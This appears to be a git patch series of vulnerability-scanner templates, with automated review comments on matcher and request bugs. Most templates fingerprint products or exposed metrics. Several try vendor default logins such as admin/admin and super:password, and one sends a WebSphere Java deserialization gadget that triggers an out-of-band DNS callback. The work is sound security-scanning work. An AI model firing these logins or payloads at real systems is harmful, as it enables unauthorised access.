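Review bot: All three raw requests hard-code `Content-Length: 44`, but only the first body is 44 bytes: `{"userName":"engineer","password":"engineer"}` is 45 bytes, so the closing brace would be cut off and the JSON rejected, and `{"userName":"guest","password":"guest"}` is 39 bytes, so the server would wait for five more bytes until the connection times out. The engine may recompute the length in its default (non-`unsafe`) raw mode, but the values are wrong as written and will break the moment the requests are sent verbatim; delete the three `Content-Length: 44` lines and let the length be derived from the body. The `word` matcher also looks for `accessToken` in `part: header` and the `kval` extractor reads it as a header/cookie key, which only works if the device returns the token in a header rather than in the JSON body — worth confirming against a captured login response.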
--- a/miscellaneous/http-present-security-headers.yaml
+++ /dev/null
@@ -1,116 +0,0 @@ -id: http-present-security-headers - -info: - name: HTTP Present Security Headers - author: socketz - severity: info - description: It searches present security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers - -requests: - - method: GET - path: - - "{{BaseURL}}" - redirects: true - max-redirects: 3 - extractors: - - type: regex - part: header - group: 0 - regex: - - "(?im)(Strict-Transport-Security):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Frame-Options):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Content-Type-Options):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Content-Security-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-Permitted-Cross-Domain-Policies):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Referrer-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Clear-Site-Data):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Embedder-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Opener-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Cross-Origin-Resource-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-XSS-Protection):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Public-Key-Pins):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Except-CT):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Feature-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Permissions-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Document-Policy):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-XSRF-TOKEN):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(X-CSRF-TOKEN):(.*)" - - 
type: regex - part: header - group: 0 - regex: - - "(?im)(X-CSRFToken):(.*)" - - type: regex - part: header - group: 0 - regex: - - "(?im)(Authorization):(.*)" From 5472deb9b4b6ee53e31e6a3c4e26ec77fe14cfed Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 14:05:10 +0530 Subject: [PATCH 011/339] Update cs141-default-login.yaml --- default-logins/abb/cs141-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 25b6b8a36e..cb51eede2c 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -20,7 +20,7 @@ requests: Connection: close {"userName":"admin","password":"cs141-snmp"} - + - | POST /api/login HTTP/1.1 Host: {{Hostname}} From f3348fa612655903df468d584ba315f45bbd3910 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 30 Aug 2021 12:53:22 +0300 Subject: [PATCH 012/339] Updated --- cves/2019/CVE-2019-14470.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml index 05400bc1a4..82704b61f3 100644 --- a/cves/2019/CVE-2019-14470.yaml +++ b/cves/2019/CVE-2019-14470.yaml @@ -4,6 +4,7 @@ info: name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: cosenary Instagram-PHP-API (aka Instagram PHP API V2), as used in the UserPro plugin through 4.9.32 for WordPress, has XSS via the example/success.php error_description parameter. reference: - https://wpscan.com/vulnerability/9815 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 From 6d5f00b199cde75279d3cb8dd1a31fbf9c34135e Mon Sep 17 00:00:00 2001 
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 1 Sep 2021 15:59:13 +0700 Subject: [PATCH 013/339] Create druid-detect.yaml --- technologies/druid-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/druid-detect.yaml diff --git a/technologies/druid-detect.yaml b/technologies/druid-detect.yaml new file mode 100644 index 0000000000..8cdd990c9e --- /dev/null +++ b/technologies/druid-detect.yaml @@ -0,0 +1,23 @@ +id: druid-detect + +info: + name: Druid monitor Detect + author: pikpikcu + severity: info + tags: tech,druid + +requests: + - method: GET + path: + - "{{BaseURL}}/druid/login.html" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "druid monitor" + - type: status + status: + - 200 From 7fcb9bd496adc55967099ee60f7a289cd3bfefd0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 1 Sep 2021 16:02:41 +0700 Subject: [PATCH 014/339] Create druid-default-password.yaml --- .../druid/druid-default-password.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 default-logins/druid/druid-default-password.yaml diff --git a/default-logins/druid/druid-default-password.yaml b/default-logins/druid/druid-default-password.yaml new file mode 100644 index 0000000000..0696eafd4a --- /dev/null +++ b/default-logins/druid/druid-default-password.yaml @@ -0,0 +1,26 @@ +id: druid-default-password + +info: + name: Druid Default Password + author: pikpikcu + severity: high + tags: druid,default-login + +requests: + - method: POST + path: + - "{{BaseURL}}/druid/submitLogin" + - "{{BaseURL}}/submitLogin" + body: "loginUsername=admin&loginPassword=admin" + + matchers-condition: and + matchers: + + - type: word + words: + - 'success' + part: body + condition: and + - type: status + status: + - 200 From 38d219be53be404790bf298d7703ff0828794966 Mon Sep 17 00:00:00 2001 
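Review bot: The word matcher `- "druid monitor"` is case-sensitive, so it only fires when the login page renders the phrase in lower case; if the page title is capitalised as "Druid Monitor" the detection silently misses. Since this series already uses `(?i)` regexes elsewhere, a `type: regex` matcher with `- "(?i)druid monitor"` removes the dependency on the page's casing. I cannot tell from the hunk which casing the page actually uses, so check one live response before changing it.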
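Review bot: The POST sends the form-encoded `body: "loginUsername=admin&loginPassword=admin"` without a `Content-Type` header; unless the engine adds one, a server that parses form fields only for `application/x-www-form-urlencoded` sees empty credentials and the check never succeeds. Add a `headers:` mapping with `Content-Type: application/x-www-form-urlencoded` under the request. Also, `condition: and` on a single-entry `words` list is a no-op and can be dropped, and the lone `- 'success'` string is a thin signal for an accepted login, which is worth noting given the `severity: high` this template carries.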
From: izn0u Date: Thu, 2 Sep 2021 16:15:34 +0000 Subject: [PATCH 015/339] Added vidyo-super default-creds Template --- default-logins/vidyo/vidyo-super-admin.yaml | 86 +++++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 default-logins/vidyo/vidyo-super-admin.yaml diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml new file mode 100644 index 0000000000..d168d2e3e0 --- /dev/null +++ b/default-logins/vidyo/vidyo-super-admin.yaml 
@@ -0,0 +1,86 @@ +id: vidyo-Default-Credentials + +info: + name: Vidyo Default Credentials + author: izn0u0 + severity: medium + description: test for default cred super:password + tags: vidyo,default-login + + +requests: + - raw: + - | + GET /super/login.html?lang=en HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + - | + POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + Content-Length: 32 + Origin: {{BaseURL}} + DNT: 1 + Connection: close + Referer: http://{{Hostname}}/super/login.html?lang=en + Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en + Upgrade-Insecure-Requests: 1 + + username=super&password=password + + + - | + GET /super/loginhistory.html?csrf_tkn={{csrf_tkn}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Referer: {{BaseURL}}/super/login.html?lang=en + DNT: 1 + Connection: close + Upgrade-Insecure-Requests: 1 + + + + + + extractors: + - type: regex + name: csrf_tkn + group: 1 + part: body + internal: true + regex: + - 'csrf_tkn=([A-Za-z0-9.-]+)' + + - type: kval + name: session + internal: true + part: header + kval: + - JSESSIONID + + cookie-reuse: true + redirects: true + #matchers-condition: and + matchers: + - type: status + 
status: + - 200 + + #- type: word + #words: + #- "welcome to" + #part: body + #- type: dsl + #dsl: + #- 'contains(body, "welcome to")' \ No newline at end of file From 223c8ea750502d5db6c323b4196cfb8b0d1e6ba3 Mon Sep 17 00:00:00 2001 From: izn0u <40471524+izn0u@users.noreply.github.com> Date: Thu, 2 Sep 2021 16:43:49 +0000 Subject: [PATCH 016/339] Update vidyo-super-admin.yaml --- default-logins/vidyo/vidyo-super-admin.yaml | 11 +---------- 1 file changed, 1 insertion(+), 10 deletions(-) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml index d168d2e3e0..901a75a5b3 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-super-admin.yaml @@ -2,7 +2,7 @@ id: vidyo-Default-Credentials info: name: Vidyo Default Credentials - author: izn0u0 + author: izn0u severity: medium description: test for default cred super:password tags: vidyo,default-login @@ -71,16 +71,7 @@ requests: cookie-reuse: true redirects: true - #matchers-condition: and matchers: - type: status status: - 200 - - #- type: word - #words: - #- "welcome to" - #part: body - #- type: dsl - #dsl: - #- 'contains(body, "welcome to")' \ No newline at end of file From f5153bda65eb5340065c1f91701fb347e4c2cf70 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 2 Sep 2021 23:02:41 +0530 Subject: [PATCH 017/339] Update vidyo-super-admin.yaml --- default-logins/vidyo/vidyo-super-admin.yaml | 30 +++------------------ 1 file changed, 4 insertions(+), 26 deletions(-) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml index 901a75a5b3..dc9e7c8953 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-super-admin.yaml 
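Review bot: The only active matcher is `- type: status` with `- 200`, which every response in the three-request sequence — including the unauthenticated GET of `/super/login.html` — satisfies, so the template reports default credentials on any reachable Vidyo portal whether or not `super:password` was accepted. Match something that appears only after login (a string on the `/super/loginhistory.html` page, or the absence of the login form) and scope it to the last response. The `Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en` line has a space before the `;`, which some cookie parsers may keep as part of the value; `JSESSIONID={{session}}; VidyoPortalSuperLanguage=en` is the standard form. The commented-out word/dsl matchers show a content check was intended; it should be finished rather than shipped disabled.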
@@ -10,47 +10,25 @@ info: requests: - raw: - - | + - | GET /super/login.html?lang=en HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - - | + + - | POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded - Content-Length: 32 Origin: {{BaseURL}} - DNT: 1 - Connection: close Referer: http://{{Hostname}}/super/login.html?lang=en Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en - Upgrade-Insecure-Requests: 1 username=super&password=password - - - | + - | GET /super/loginhistory.html?csrf_tkn={{csrf_tkn}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Referer: {{BaseURL}}/super/login.html?lang=en - DNT: 1 - Connection: close - Upgrade-Insecure-Requests: 1 - - - extractors: From 601aa39472b51a0a1dd228ada5ddf4592ae5b2bf Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 2 Sep 2021 23:03:07 +0530 Subject: [PATCH 018/339] Update vidyo-super-admin.yaml --- default-logins/vidyo/vidyo-super-admin.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml index dc9e7c8953..c3b20673bb 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml 
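Review bot: On the new side the second request still sends `Referer: http://{{Hostname}}/super/login.html?lang=en` while the third uses `Referer: {{BaseURL}}/super/login.html?lang=en`; on an HTTPS target the hard-coded `http://` produces a Referer whose scheme does not match the origin the portal served, which a Referer-checking login handler may reject. Use `Referer: {{BaseURL}}/super/login.html?lang=en` in both places. The `raw` request block continues past the hunk into the extractors.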
+++ b/default-logins/vidyo/vidyo-super-admin.yaml @@ -1,4 +1,4 @@ -id: vidyo-Default-Credentials +id: vidyo-default-credentials info: name: Vidyo Default Credentials From c038ae90abeb0579c3b09419a079816c9c9b38cf Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 2 Sep 2021 23:05:12 +0530 Subject: [PATCH 019/339] Update vidyo-super-admin.yaml --- default-logins/vidyo/vidyo-super-admin.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml index c3b20673bb..0749aa4548 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-super-admin.yaml @@ -30,6 +30,8 @@ requests: Host: {{Hostname}} Referer: {{BaseURL}}/super/login.html?lang=en + cookie-reuse: true + redirects: true extractors: - type: regex @@ -47,9 +49,7 @@ requests: kval: - JSESSIONID - cookie-reuse: true - redirects: true matchers: - - type: status - status: - - 200 + - type: word + words: + - "Vidyo MainSuperAdmin" From ca2963beb63c6cd5e6ae8e935bd6ecd869ec12b5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 12:15:26 +0530 Subject: [PATCH 020/339] encoding update --- cves/2015/CVE-2015-7450.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index a28bfc6ead..39d042bfcf 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml 
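Review bot: In the `@@ -47,9 +49,7 @@` hunk the new `- type: word` matcher for `"Vidyo MainSuperAdmin"` has no `part` and no per-request scoping, so it is evaluated against the body of each of the three responses, including the unauthenticated login page; if that string is part of the portal's static markup the template still reports a successful login without the credentials having worked. If the engine version targeted supports `req-condition: true`, a `dsl` matcher such as `contains(body_3, "Vidyo MainSuperAdmin")` pins the check to the post-login response; otherwise confirm on a live portal that the string is absent from `/super/login.html`. The removed status matcher was a reasonable secondary condition and could be kept alongside the word match under `matchers-condition: and`.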
@@ -27,7 +27,7 @@ requests: rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA== getUnsavedChanges - {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64")}} + {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}} rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24= From 9fdac495f7582f3c502742cb6ebbd999f97d18fc Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 12:16:53 +0530 Subject: [PATCH 021/339] more tags --- cves/2015/CVE-2015-7450.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index 39d042bfcf..e27a3e815f 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -9,7 +9,7 @@ info: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - tags: cve,cve2015,websphere,deserialization,rce + tags: cve,cve2015,websphere,deserialization,rce,oob requests: - raw: From 6e2816be3e9cace2ef5256c46148beeca0f373f1 Mon Sep 17 00:00:00 2001 
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 3 Sep 2021 20:12:53 +0530 Subject: [PATCH 022/339] Add files via upload --- .../kubernetes-exposed-metrics.yaml | 24 +++++++++++++++++ misconfiguration/node-exporter-metrics.yaml | 27 +++++++++++++++++++ .../overview-kubernetes-resource-report.yaml | 25 +++++++++++++++++ 3 files changed, 76 insertions(+) create mode 100644 misconfiguration/kubernetes-exposed-metrics.yaml create mode 100644 misconfiguration/node-exporter-metrics.yaml create mode 100644 misconfiguration/overview-kubernetes-resource-report.yaml diff --git a/misconfiguration/kubernetes-exposed-metrics.yaml b/misconfiguration/kubernetes-exposed-metrics.yaml new file mode 100644 index 0000000000..f33fd429b0 --- /dev/null +++ b/misconfiguration/kubernetes-exposed-metrics.yaml @@ -0,0 +1,24 @@ +id: kubernetes-exposed-metrics +info: + name: Detect Kubernetes Exposed Metrics + author: pussycat0x + severity: low + description: Information Disclosure of Garbage Collection + tags: kubernetes,exposure, metrics +requests: + - method: GET + path: + - "{{BaseURL}}:8080/metrics" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "namespace" + - "HELP" + - "TYPE" + - "kube" + condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/misconfiguration/node-exporter-metrics.yaml b/misconfiguration/node-exporter-metrics.yaml new file mode 100644 index 0000000000..5320578547 --- /dev/null +++ b/misconfiguration/node-exporter-metrics.yaml 
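Review bot: The path `"{{BaseURL}}:8080/metrics"` appends a port to a variable that already holds scheme, host and, when the input carries one, port, so an input like `https://host:443` becomes `https://host:443:8080/metrics`, which is not a valid URL and the request never reaches the exporter; the same pattern appears with `:9100` in `node-exporter-metrics.yaml` and `overview-kubernetes-resource-report.yaml`. Build the URL from host components instead (the series already uses `{{Hostname}}` in raw requests), for example `{{Scheme}}://{{Host}}:8080/metrics` if those variables exist in the engine version targeted. The `description: Information Disclosure of Garbage Collection` is copied verbatim into `node-exporter-metrics.yaml` and describes neither template, and `tags: kubernetes,exposure, metrics` carries a stray space that may leave the third tag as ` metrics` if the list is split on commas only.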
@@ -0,0 +1,27 @@ +id: node-exporter-metrics +info: + name: Detect Node Exporter Metrics + author: pussycat0x + severity: low + description: Information Disclosure of Garbage Collection + tags: node,exposure, metrics +requests: + - method: GET + path: + - "{{BaseURL}}:9100/metrics" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "go_goroutines" + - "HELP" + - "gauge" + - "node_cooling_device" + - "node_network" + - "boot" + - "TYPE go_goroutines gauge" + condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/misconfiguration/overview-kubernetes-resource-report.yaml b/misconfiguration/overview-kubernetes-resource-report.yaml new file mode 100644 index 0000000000..76c3dbd457 --- /dev/null +++ b/misconfiguration/overview-kubernetes-resource-report.yaml @@ -0,0 +1,25 @@ +id: overview-kubernetes-resource-report +info: + name: Detect Overview Kubernetes Resource Report + author: pussycat0x + severity: medium + description: Information Disclosure of Kubernetes Resource Report + tags: Kubernetes,exposure +requests: + - method: GET + path: + - "{{BaseURL}}:9100/metrics" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Overview - Kubernetes Resource Report" + - "Overview - Kubernetes Resource Report" + - "Pods" + - "Worker Nodes" + - "Applications" + condition: and + - type: status + status: + - 200 \ No newline at end of file From c91fbf2af480cfa7e4ea6d9cdc2a56a73efb9c16 Mon Sep 17 00:00:00 2001 
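Review bot: In `overview-kubernetes-resource-report.yaml` the request targets `"{{BaseURL}}:9100/metrics"`, the node-exporter endpoint, yet the matcher expects the HTML strings `Overview - Kubernetes Resource Report`, `Pods`, `Worker Nodes` and `Applications`, which a text-format metrics response will never contain; the path looks copied from the neighbouring template and should point at the report's own UI path (at minimum `"{{BaseURL}}"`). The `words` list also repeats `"Overview - Kubernetes Resource Report"` twice, harmless under `condition: and` but clearly a paste error, and `tags: Kubernetes,exposure` uses a capital letter unlike every other tag in this series.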
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 3 Sep 2021 20:47:35 +0530 Subject: [PATCH 023/339] Add files via upload --- technologies/abyss-web-server.yaml | 21 ++++++++++++++++++ .../kubernetes-enterprise-manager.yaml | 21 ++++++++++++++++++ technologies/mirantis-kubernetes-engine.yaml | 21 ++++++++++++++++++ technologies/oracle-iplanet-web-server.yaml | 22 +++++++++++++++++++ 4 files changed, 85 insertions(+) create mode 100644 technologies/abyss-web-server.yaml create mode 100644 technologies/kubernetes-enterprise-manager.yaml create mode 100644 technologies/mirantis-kubernetes-engine.yaml create mode 100644 technologies/oracle-iplanet-web-server.yaml diff --git a/technologies/abyss-web-server.yaml b/technologies/abyss-web-server.yaml new file mode 100644 index 0000000000..2e65c1eef3 --- /dev/null +++ b/technologies/abyss-web-server.yaml @@ -0,0 +1,21 @@ +id: abyss-web-server-detect +info: + name: Detect Abyss Web Server + author: pussycat0x + severity: info + tags: tech + reference: app="Abyss-Web-Server" -fofa query +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Welcome to Abyss Web Server" + condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/technologies/kubernetes-enterprise-manager.yaml b/technologies/kubernetes-enterprise-manager.yaml new file mode 100644 index 0000000000..ed6241c0f9 --- /dev/null +++ b/technologies/kubernetes-enterprise-manager.yaml @@ -0,0 +1,21 @@ +id: kubernetes-enterprise-manager +info: + name: Detect Kubernetes Enterprise Manager + author: pussycat0x + severity: info + tags: tech + reference: app="Kubernetes-Enterprise-Manager" -fofa query +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Kubernetes Enterprise Manager" + condition: and + - type: status + status: + - 200 \ No newline at end of file 
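Review bot: `reference: app="Abyss-Web-Server" -fofa query` puts a search-engine query where the template schema expects a reference URL or list of URLs; the same appears in `kubernetes-enterprise-manager.yaml`, `mirantis-kubernetes-engine.yaml` and `oracle-iplanet-web-server.yaml` (where the closing quote is also missing). Either drop the line or move the query into `description:` so consumers that render references as links do not get a broken entry. In all four files `condition: and` is applied to a single-entry `words` list and can be removed, and `tags: tech` alone omits a product tag such as `abyss`, unlike the other technology templates in this series (e.g. `tags: tech,druid`).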
diff --git a/technologies/mirantis-kubernetes-engine.yaml b/technologies/mirantis-kubernetes-engine.yaml new file mode 100644 index 0000000000..9988ad9a0f --- /dev/null +++ b/technologies/mirantis-kubernetes-engine.yaml @@ -0,0 +1,21 @@ +id: mirantis-kubernetes-engine +info: + name: Detect Mirantis Kubernetes Engine + author: pussycat0x + severity: info + tags: tech + reference: app="Mirantis-Kubernetes-Engine" -fofa query +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Mirantis Kubernetes Engine" + condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/technologies/oracle-iplanet-web-server.yaml b/technologies/oracle-iplanet-web-server.yaml new file mode 100644 index 0000000000..abdc9fc14e --- /dev/null +++ b/technologies/oracle-iplanet-web-server.yaml @@ -0,0 +1,22 @@ +id: oracle-iplanet-web-server-detect +info: + name: Detect Oracle-iPlanet-Web-Server + author: pussycat0x + severity: info + tags: tech + reference: app="Oracle-iPlanet-Web-Server -fofa query +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Oracle iPlanet Web Server 7.0" + - "Oracle iPlanet Web Server" + condition: and + - type: status + status: + - 200 \ No newline at end of file From ac4bce9ca58ceecde41e9d999d4008d740bd17a2 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 3 Sep 2021 11:28:42 -0500 Subject: [PATCH 024/339] Update php-errors.yaml Made better through use of regex extractors. More useful information is displayed on-screen. --- misconfiguration/php-errors.yaml | 47 ++++++++++++++++++-------------- 1 file changed, 26 insertions(+), 21 deletions(-) diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index d4b4f20178..11e7defb9f 100644 --- a/misconfiguration/php-errors.yaml 
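Review bot: In `oracle-iplanet-web-server.yaml` the two words `"Oracle iPlanet Web Server 7.0"` and `"Oracle iPlanet Web Server"` are combined with `condition: and`, and since the second is a substring of the first the matcher reduces to "version 7.0 only", so any other iPlanet release is silently missed by a template whose id claims generic detection. Keep just `- "Oracle iPlanet Web Server"` (or switch to `condition: or`) and, if the version matters, capture it with a regex extractor instead of pinning the match to it.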
+++ b/misconfiguration/php-errors.yaml @@ -2,31 +2,36 @@ id: php_errors info: name: PHP errors - author: w4cky_ + author: w4cky_,geeknik severity: info - tags: debug + tags: debug,php requests: - method: GET path: - "{{BaseURL}}" - matchers: - - type: word - words: - - "Fatal error" - - "Call to undefined method" - - "You have an error in your SQL syntax;" - - "MySQL server version for the right syntax to use near" - - "PHP Warning" - - "PHP Error" - - "Warning: mysql_connect():" - - "Warning: mysql_query()" - - "Warning: pg_connect():" - - "failed to open stream: HTTP request failed" - - "SAFE MODE Restriction in effect." - - "Cannot modify header information" - - "ORA-00921: unexpected end of SQL command" - - "ORA-00933: SQL command not properly ended" - - "ORA-00936: missing expression" - - "ORA-12541: TNS:no listener" \ No newline at end of file + extractors: + - type: regex + regex: + - '(?i)Fatal error' + - '(?i)Call to undefined method' + - '(?i)You have an error in your SQL syntax' + - '(?i)MySQL server version for the right syntax to use near' + - '(?i)PHP (Warning|Error)' + - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' + - '(?i)failed to open stream\:' + - '(?i)SAFE MODE Restriction in effect' + - '(?i)Cannot modify header information' + - '(?i)ORA-00921\: unexpected end of SQL command' + - '(?i)ORA-00933\: SQL command not properly ended' + - '(?i)ORA-00936\: missing expression' + - '(?i)ORA-12541\: TNS\:no listener' + - '(?i)uncaught exception' + - '(?i)include_path' + - '(?i)undefined index' + - '(?i)undefined variable\:' + - '(?i)stack trace\:' + - '(?i)expects parameter [0-9]*' + - '(?i)Debug Trace' + - '(?i)(syntax|parse) error' From 6ba8cb040d21c98c8441d29de0e5db35c3fa2e5b Mon Sep 17 00:00:00 2001 
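Review bot: Several of the new extractor patterns are generic enough to fire on ordinary page text rather than PHP diagnostics — `'(?i)include_path'`, `'(?i)Debug Trace'`, `'(?i)stack trace\:'`, `'(?i)undefined index'` and `'(?i)(syntax|parse) error'` will all match documentation, changelogs or tutorial pages — and with the `matchers:` block removed entirely, every such hit becomes a finding. Anchoring the loose ones to PHP's own output shape (the `<b>Warning</b>:` / `<b>Fatal error</b>:` prefixes PHP emits with html_errors on, or the trailing ` in /path on line N` fragment) keeps the extra coverage without the noise. The original `words` were case-sensitive, so switching everything to `(?i)` widens the match further; the effect is worth checking on a few non-PHP hosts before merging.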
